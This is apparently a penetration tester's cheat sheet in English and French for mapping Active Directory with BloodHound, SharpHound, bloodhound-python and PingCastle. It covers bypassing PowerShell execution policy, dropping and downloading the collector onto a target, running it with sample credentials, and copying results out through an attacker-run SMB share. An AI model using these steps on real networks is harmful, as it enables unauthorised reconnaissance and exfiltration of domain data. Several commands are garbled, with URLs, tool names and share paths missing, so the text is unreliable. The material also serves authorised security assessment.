Domain Mapping



# Right Click
# Get information about the node and also how to compromise the user / machine

# Owned
# Can be usefull during an internal pentest to note where you are
# Nodes will be tagged with a skull
# It's then possible to ask the shortest path to a node from the owned ones

# Filters
# Can be usefull

# Shortcuts
# CTRL --> Change node display
# CTRL+SHIFT+I --> Developper Tools
# CTRL+R --> Reload display

# Still possible to edit data to set what you want
# If you don't have access to a domain machine but have creds
# You can run from host
runas /netonly /user:FQDN.local\USER powershell
# Then
Import-Module Sharphound.ps1
Invoke-BloodHound -ZipFileName 'PATH/TO/' -JsonFolder 'PATH/TO/folderas above' -CollectionMethod All -Domain  FQDN
# Bloodhound directement depuis la machine cible
# apt-get install bloodhound

# Setup
$ sudo neo4j console
... http://localhost:7474
user/pass = neo4j/neo4j

# Start
$ bloodhound
URL : bolt://
Target Collection
# On the target, drop the Sharphound ingestor
# You can drop it through shared folder or by download

# Powershell
Powershell.exe -Exec Bypass
Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All

# Default : Domains, Computers, Users, Groups
# All : Domains, Computers, Users, Groups, OUs, GPOs

# Exe
# You may need some .NET packages
C:\> SharpHound.exe
C:\> SharpHound.exe — CollectionMethod SessionLoop — MaxLoopTime 1h
C:\> SharpHound.exe — CollectionMethod ACL

.\SharpHound.exe --domain UCA.LAN --domaincontroller --ldapusername "die-hardman" --ldappassword "maskonyourface" --CollectionMethod Group,LocalGroup,GPOLocalGroup,Session,LoggedOn,ObjectProps,ACL,ComputerOnly,Trusts,Default,RDP,DCOM,DCOnly
# Python based ingestor (for remote work)

# Collection Methods : Default, Group, LocalAdmin, RDP, DCOM, Session, Acl, Trusts, LoggedOn, ObjectProps, All (except LoggedOn)
bloodhound-python -u USERNAME -p PASSWORD -d DOMAIN --collectionmethod All
# Drop BloodHound ingestor and get results back through SMB Server
python -m SimpleHTTPServer
Invoke-WebRequest -Uri “” -OutFile “.\SharpHound.ps1”

Powershell.exe -Exec Bypass
Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All

# Since Windows 10 you can't do anonymous smbserver anymore
sudo python SDFR /BloodHound/Ingestors -smb2support -username "peon" -password "peon"

net use Z: \\\SDFR /user:peon peon
net use Z: /delete /y

copy C:\Users\xxx\Documents\ \\\TESTLOL\


# Results will be zipped
# Get back zip, unzip it and upload files into bloodhound
# Custom queries

# Replace or update the following file

# Automated, extensible toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets.

./ -u neo4j -p BloodHound -d TESTLAB.LOCAL
./ -u neo4j -p hunter2 -d BigTech.corp -a -t 5m -v true


Lien :
> Drop exe on the target
> Run Pingcastle.exe (mode interactif par défaut)
> Healthcare (enter) et domaine (*)

> Mode CLI :
> PingCastle --healthcheck --server
> PingCastle --carto